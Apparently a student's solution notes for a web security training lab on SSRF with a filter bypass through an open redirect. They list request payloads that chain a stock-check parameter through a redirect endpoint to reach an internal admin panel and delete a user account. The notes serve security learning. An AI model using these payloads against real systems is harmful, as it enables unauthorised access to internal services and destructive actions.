Lab #5: SSRF with filter bypass via open redirection vulnerability

End goal:
- access admin interface at http://192.168.0.12:8080/admin
- Delete carlos

Analysis:

1. Access admin interface

stockApi=http://192.168.0.12:8080/admin
--> "Invalid external stock check url 'Invalid URL'"

stockApi=/product/stock/check%3FproductId%3D1%26storeId%3D1
--> OK

stockApi=/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin

2. Delete carlos

ENCODE this path
stockApi=/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin/delete?username=carlos